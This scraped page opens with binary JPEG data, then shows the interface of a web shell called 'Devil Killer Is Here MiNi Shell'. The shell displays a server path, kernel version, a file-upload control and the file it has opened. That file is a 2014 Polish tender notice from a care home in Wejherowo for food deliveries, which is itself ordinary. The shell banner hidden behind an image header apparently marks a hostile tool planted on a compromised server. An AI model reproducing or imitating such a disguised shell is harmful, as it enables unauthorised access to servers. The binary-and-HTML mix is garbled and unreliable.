JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141210/255543-N-2014.html

<p class="kh_header"><b>Wejherowo: Dostawa produktów ogólnospożywczych z podziałem na części  na potrzeby żywienia w Domu Pomocy Społecznej</b><br>
<b>Numer ogłoszenia: 255543 - 2014; data zamieszczenia: 10.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Przebendowskiego 1, 84-200 Wejherowo, woj. pomorskie, tel. 0-58 672-15-91, faks 0-58 672-67-11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpswejherowo.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów ogólnospożywczych z podziałem na części  na potrzeby żywienia w Domu Pomocy Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> aromaty do ciast 5ml szt. 100,
cukier waniliowy   32g szt. 150,
cynamon  20g szt. 120,
herbata granulowana  80g szt. 400,
kakao  200 szt. 140,
kwasek cytrynowy    20g szt. 290,
liście laurowe  6g szt. 130,
musztarda 480g, szt. 240,
ocet spirytusowy 10%  0,5 litra  szt. 5,
papryka mielona słodka  i ostra 20g szt. 150,
pieprz czarny mielony 15g szt. 200,
proszek do pieczenia  18g szt.50,
przyprawa do piernika  20g szt. 10,
soda oczyszczona 60g szt. 10,
sól paczkowana 1kg kg 400,
ziele angielskie 15g szt. 130,
herbatniki petit 50g szt. 1125,
budyń 40g szt. 500,
galaretki 79g szt. 350,
przyprawa warzywna Kucharek1000g szt. 45,
kawa zbożowa 500g szt. 50,
keczup łagodny 480g szt. 220,
kisiel 40g szt. 500,
majonez 900g szt. 140,
pieprz ziołowy 20g szt. 25,
przyprawa magii Winiary 0,96 litra szt. 130,
rodzynki Sułtanki 100g szt. 70,
żelatyna 50g szt. 300,
żurek w butelce 0,5l szt. 10,
śliwki suszone kalifornijskie 125g szt. 10,
mąka ziemniaczana  kg 50,
ananasy w syropie 580g szt. 50 ,
dżem owocowy słodzony 270g szt. 300,
kompot owocowy 900ml szt. 380, 
marmolada 600g szt. 10,
kukurydza  w puszcze 400g szt. 40,
powidła 280g szt. 15,
syrop  500 ml szt.1600,
śliwki suszone kg 1,
cukier puder kg 70,
cukier torebki kg 1700,
miód sztuczny  380g szt. 120,
fasolka szparagowa 500g szt. 350,
groszek konserwowy 400g szt. 190,
chrzan 170g szt. 80,
ćwikła z chrzanem 350g szt. 50,
koncentrat pomidorowy 900g szt. 150,
majeranek 7g szt.180,
marchew  z groszkiem 900g szt.300,
ogórki konserwowe 900g szt. 250,
mak kg 15,
olej rzepakowy1 litr szt. 20,
olej rzepakowy 3 litr  80,
kasza gryczana kg 40,
kasza manna  kg 200,
kasza mazurska  kg 95,
kasa wiejska  kg 15,
makaron nitki 500g szt. 200,
makaron kolanko  500g szt. 200,
makaron świderki 500g szt. 200,
mąka tortowa 1kg- typ 500 kg 50,
mąka wrocławska 1kg - typ 500 kg 700,
płatki owsiane zwykłe  1kg kg 65,
ryż biały długo- ziarnisty kg 260,
baleron wędzony parzony kg 20,
biała  surowa kg 25,
mielonka drobiowa kg 130,
blok szynkowy wieprzowy kg 15,
boczek rolowany z przyprawami kg 10,
szynkówka dębicka kg 80,
krakowska parzona kg 15,
kaszanka kg 35,
bukowa kg 125,
mortadela popularna kg 240,
mielonka wieprzowa kanapkowa kg 120,
metka kaszubska kg 30,
mielonka turystyczna kg 60,
podwawelska kg 40,
przekładaniec z indyka 165,
pasztetowa wieprzowa kg 175,
pasztet drobiowy zapiekany kg 20,
pieczeń chlebowa kg 70,
polędwica miodowa kg 30,
polędwica sopocka kg 15,
parówki wieprzowe PC kg 215,
serdelki wieprzowe kg 310,
salceson czarny ozorkowy kg 30,
salceson drobiowy kg 85,
salceson wieprzowy kg 40,
śląska kg 175,
szynka gotowana kg 25,
szynkówka wieprzowa kanapkowa kg 30,
ogonówka wieprzowa wędzona parzona kg 30,
toruńska wieprzowa kg 80 ,
zwyczajna kg 65,
żywiecka kg 40,
boczek wieprzowy wędzony b/kości kg 170,
boczek wieprzowy świeży b/kości kg 30,
karkówka wieprzowa bez kości kg 55,
łopatka wieprzowa bez kości ,bez skóry kg 55,
mięso wieprzowe z  szynki-gulaszowe kg 290,
mięso wieprzowe drobne z szynki kg 350,
słonina wieprzowa kg 155,
smalec wieprzowy kg 40,
schab wieprzowy bez kości kg 15,
szynka wieprzowa świeża bez kości kg 290,
wątroba wieprzowa kg 30,
żeberka wieprzowe kg 470,
porcje rosołowe drobiowe kg 850,
kurczaki kg 1000,
piersi z kurczaka kg 230,
wątroba drobiowa kg 100,
żołądki drobiowe kg 135, 
mleko folia litrowe szt. 8600,
mleko karton litrowe szt. 70,
śmietana  36 procent 0,5 litrowa szt. 36,
śmietana luzem 18 procent litr 530,
masło extra kostka  kg 1120,
ser salami kg 40,
ser gouda kg 70,
Ser morski kg 70,
ser edamski kg 70,
ser tylżycki kg 70,
serek homogenizowany smakowy 250 g ,szt. 500,
serek ostrowie smakowy 120g ,szt. 900,
twaróg foremka kg 600, 
ser topiony kostka 100g ,kg 160,
margaryna rama250g,  kg 20, 
margaryna palma kostka kg70
margaryna rama450g szt. 130 ,
Margaryna Delma 500g ,szt. 10,
maślanka1 litr szt. 1100,
jogurt owocowy 150g ,szt. 150,
kefir1 litr szt. 10,
filet z dorsza ze skórą kg 200,
karp patroszony kg 20,
kostka rybna mrożona kg 90,
makrela patroszona bez głów kg 250,
masełko rybne kg 60,
mielone rybne z dorsza kg 30,
płaty śledziowe solone kg 90,
pstrąg patroszony kg 180,
tuszka śledziowa kg 60,
rolmopsy w occie kg10,
rolmopsy w oleju kg10,
drożdże kg 10,
ciasto drożdżowe kg 30,
drożdżówki 100g szt. 300,
bułki paryskie 300g szt. 1400,
bułka tarta kg 170,
chleb zwykły krojony 500g ,szt. 12000,
chleb  zwykły razowy 500g ,kg 950, 
bułki szwedki 70g, szt. 75,
pączki szt. 225,
faworki kg 10,
jabłecznik kg 10,
drożdżowe z owocami kg10,
sernik kg 10,
miodownik kg 10,
ciasto kakaowe kg 10,
babki różne kg 10,
arbuz kg 60,
banany I- IV kg 72,
banany X- XII kg 72,
botwina pęczki Miesiąc V-VI pęczki160,
brukiew  Miesiąc IX-II kg 270,
buraki Miesiąc I-III kg 220,
buraki Miesiąc IV-VI kg 220,
buraki Miesiąc VII-IX kg 220,
buraki Miesiąc X-XII kg 220,
brzoskwinie kg 60,
cebula Miesiąc I-III kg 90,
cebula  Miesiąc IV-VI kg 90,
cebula Miesiąc VII-IX kg 90,
cebula Miesiąc X-XII kg 90,
cukinia Miesiąc IX kg 10,
cytryny  1kg Miesiąc IV kg 20,
czosnek   Miesiąc I-III Kg 0,5,
czosnek   Miesiąc IV-VI Kg 0,5,
czosnek   Miesiąc VII-IX Kg 0,5,
czosnek   Miesiąc X-XII Kg 0,5,
fasola Jaś Miesiąc I-III Kg 5,
fasola Jaś Miesiąc IV-VI Kg 5,
fasola Jaś Miesiąc VII-IX Kg 5,
fasola Jaś Miesiąc X-XII Kg 5,
fasolka drobna Miesiąc I-III Kg 5,
fasolka drobna Miesiąc IV-VI Kg 5,
fasolka drobna Miesiąc VII-IX Kg 5, 
fasolka drobna Miesiąc X-XI Kg 5,
fasolka szparagowa  Miesiąc VII-IX Kg 200,
groch  Kg 20 ,
gruszki Miesiąc VI-IX Kg 10,
jabłka Miesiąc I-III Kg 500,
jabłka Miesiąc IV-VI Kg 500,
jabłka 1kg Miesiąc VII-IX Kg350,
jabłka 1kg Miesiąc X-XII Kg 500,
jaja klasa L  Miesiąc I-III Szt. 4000,
jaja klasa L - Miesiąc IV-VI Szt. 4000,
jaja klasa L - Miesiąc VII-IX Szt. 4000,
jaja klasa L - Miesiąc X-XII Szt. 4000,
kalafior Miesiąc VI-VIII Gł. 130,
kalafior Miesiąc IX-XII Gł. 130,
kapusta kiszona Miesiąc I-III Kg 50,
kapusta kiszona Miesiąc IV-VI Kg 50,
kapusta kiszona Miesiąc VII-IX Kg 30 ,
kapusta kiszona Miesiąc X-XII Kg50,
kapusta biała Miesiąc IV-VI Gł. 200,
kapusta biała Miesiąc VII-X Gł. 150,
kapusta biała Miesiąc I-III Kg 60,
kapusta biała Miesiąc X-XII Kg 60,
kapusta czerwona  Miesiąc X-XII Gł. 35,
kapusta włoska Miesiąc I-III Gł. 50,
kapusta włoska Miesiąc IV-VII Gł. 50,
kapusta włoska Miesiąc VIII-IX Gł. 50,
kapusta włoska Miesiąc X-XII Gł. 50,
kapusta pekińska Miesiąc I-III Gł. 5,
kapusta pekińska Miesiąc IV-VI Gł. 5,
kapusta pekińska Miesiąc VII-IX Gł. 5,
kapusta pekińska Miesiąc X-XII Gł. 5,
kiwi Kg 10,
koperek Miesiąc I-III Pęcz. 175,
koperek- Miesiąc IV-VI Pęczki 175,
koperek Miesiąc VII-IX Pęczki 175,
koperek- Miesiąc X-XII Pęczki 175,
mandarynki Miesiąc I-II Kg 30 ,
mandarynki  Miesiąc III-V Kg 30,
mandarynki  Miesiąc X-XII Kg 30,
marchew  Miesiąc I-III Kg 600,
marchew  Miesiąc IV-VI Kg 500,
marchew   Miesiąc VII-IX Kg 500,
marchew  Miesiąc X-XII Kg 500,
morele Miesiąc VII-VIII Kg 60,
nektarynki Miesiąc VII-VIII Kg 60,
ogórki kiszone Miesiąc I-III Kg 120,
ogórki kiszone Miesiąc IV-VI Kg 120,
ogórki kiszone Miesiąc VII-IX Kg 120,
ogórki kiszone Miesiąc X-XII Kg 120,
ogórki świeże  Miesiąc V-VII Kg 40,
ogórki świeże   Miesiąc VIII-IX Kg 40,
pieczarki   Miesiąc I-III Kg 20,
pieczarki  Miesiąc IV-VI Kg 20,
pieczarki  1kg Miesiąc VII-IX Kg 15,
pieczarki  Miesiąc X-XII Kg 20,
pietruszka   Miesiąc I-III Kg 110,
pietruszka  Miesiąc IV-VI Kg 110,
pietruszka   Miesiąc VII-IX Kg 110,
pietruszka   Miesiąc X-XII Kg 110,
pomarańcze  Miesiąc IV Kg 20,
pomarańcze Miesiąc XII Kg 20,
pomidory Miesiąc VII-IX  kg 260, 
pomidory Miesiąc X-XII kg 250, 
por  Miesiąc I-III Kg 110, 
por  Miesiąc IV-VI Kg 110, 
por Miesiąc VII-IX Kg 110, 
por Miesiąc X-XII Kg 110,
rzodkiewki Miesiąc I-III Pęczki 45,
rzodkiewki Miesiąc IV-VI Pęczki 40,
rzodkiewki Miesiąc VII-IX Pęczki 40,
rzodkiewki i Miesiąc X-XII Pęczki 45,
rzodkiew biała Miesiąc IX-XII Kg 20,
sałata Miesiąc IV-VI Główki 200,
sałata Miesiąc VII-VIII Główki 230,
sałata główki Miesiąc IX- XII Główki 200,
sałata lodowa Główki 20,
seler Miesiąc I-III Kg 150,
seler Miesiąc IV-VI Kg 150,
seler Miesiąc VII-IX Kg 150,
seler Miesiąc X-XII Kg 150,
szczypior Miesiąc I-III Pęczki 70,
szczypior Miesiąc IV-VI Pęczki 65,
szczypior Miesiąc VII-IX Pęczki 65,
szczypior Miesiąc X-XII Pęczki 70,
truskawki Sezon V-VII Kg 50,
winogrono Miesiąc IX-XII Kg 20 ,
zielona pietruszka pęczki 100g Miesiąc I-III Pęczki 180,
zielona pietruszka pęczki 100g Miesiąc IV-VI Pęczki 180,
zielona pietruszka pęczki 100g Miesiąc VII-IX Pęczki 180,
zielona pietruszka pęczki 100g Miesiąc X-XII Pęczki 180,
ziemniaki Miesiąc I-III Kg 3500,
ziemniaki Miesiąc IV-VI Kg 3500,
ziemniaki Miesiąc VII-IX Kg 3500,
ziemniaki Miesiąc X-XII Kg 3500,
brukselka IX-XII  kg20,
szczaw V-IX kg20,
kalarepa VI-IX szt.20,
dynia IX-XII kg 20..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy zgodnie i na zasadach określonych w art.67 ust.1 pkt 7 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.90.00-5, 15.13.11.34-3, 15.13.11.00-6, 15.13.11.30-5, 15.13.11.35-0, 15.22.00.00-6, 15.23.20.00-3, 15.23.40.00-7, 15.33.22.00-6, 15.33.11.40-0, 15.41.10.00-2, 15.50.00.00-3, 15.51.00.00-6, 15.53.00.00-2, 15.55.13.00-8, 15.55.15.00-0, 15.54.20.00-9, 15.54.40.00-3, 03.14.25.00-3, 03.22.23.20-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności i spełnia warunki zawarte w art. 22 ust. 1 ustawy Wykonawca składa następujące dokumenty aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada wiedzę i doświadczenie Wykonawca składa  oświadczenie sporządzone według wzoru określonego w załączniku nr 8 do specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu warunku  art.22 ust. 1, sporządzone według wzoru stanowiącego załącznik nr 8 do specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswejherowo.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej  w  Wejherowie, ul. Przebendowskiego 1 , 84-200 Wejherowo; 
telefon 58 672-15-91, fax.58 672-67-11, e-mail: dpswejherowo@gmail.com.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2014 godzina 09:00, miejsce: Dom Pomocy Społecznej  w  Wejherowie, ul. Przebendowskiego 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa różnych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aromaty do ciast 5ml szt. 100,
cukier waniliowy   32g szt. 150,
cynamon  20g szt. 120,
herbata granulowana  80g szt. 400,
kakao  200 szt. 140,
kwasek cytrynowy    20g szt. 290,
liście laurowe  6g szt. 130,
musztarda 480g, szt. 240,
ocet spirytusowy 10%  0,5 litra  szt. 5,
papryka mielona słodka  i ostra 20g szt. 150,
pieprz czarny mielony 15g szt. 200,
proszek do pieczenia  18g szt.50,
przyprawa do piernika  20g szt. 10,
soda oczyszczona 60g szt. 10,
sól paczkowana 1kg kg 400,
ziele angielskie 15g szt. 130,
herbatniki petit 50g szt. 1125,
budyń 40g szt. 500,
galaretki 79g szt. 350,
przyprawa warzywna Kucharek1000g szt. 45,
kawa zbożowa 500g szt. 50,
keczup łagodny 480g szt. 220,
kisiel 40g szt. 500,
majonez 900g szt. 140,
pieprz ziołowy 20g szt. 25,
przyprawa magii Winiary 0,96 litra szt. 130,
rodzynki Sułtanki 100g szt. 70,
żelatyna 50g szt. 300,
żurek w butelce 0,5l szt. 10,
śliwki suszone kalifornijskie 125g szt. 10,
mąka ziemniaczana  kg 50,
ananasy w syropie 580g szt. 50 ,
dżem owocowy słodzony 270g szt. 300,
kompot owocowy 900ml szt. 380, 
marmolada 600g szt. 10,
kukurydza  w puszcze 400g szt. 40,
powidła 280g szt. 15,
syrop  500 ml szt.1600,
śliwki suszone kg 1,
cukier puder kg 70,
cukier torebki kg 1700,
miód sztuczny  380g szt. 120,
fasolka szparagowa 500g szt. 350,
groszek konserwowy 400g szt. 190,
chrzan 170g szt. 80,
ćwikła z chrzanem 350g szt. 50,
koncentrat pomidorowy 900g szt. 150,
majeranek 7g szt.180,
marchew  z groszkiem 900g szt.300,
ogórki konserwowe 900g szt. 250,
mak kg 15,
olej rzepakowy1 litr szt. 20,
olej rzepakowy 3 litr  80,
kasza gryczana kg 40,
kasza manna  kg 200,
kasza mazurska  kg 95,
kasa wiejska  kg 15,
makaron nitki 500g szt. 200,
makaron kolanko  500g szt. 200,
makaron świderki 500g szt. 200,
mąka tortowa 1kg- typ 500 kg 50,
mąka wrocławska 1kg - typ 500 kg 700,
płatki owsiane zwykłe  1kg kg 65,
ryż biały długo- ziarnisty kg 260,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa wędlin, mięsa, drobiu i ich przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wędzony parzony kg 20,
biała  surowa kg 25,
mielonka drobiowa kg 130,
blok szynkowy wieprzowy kg 15,
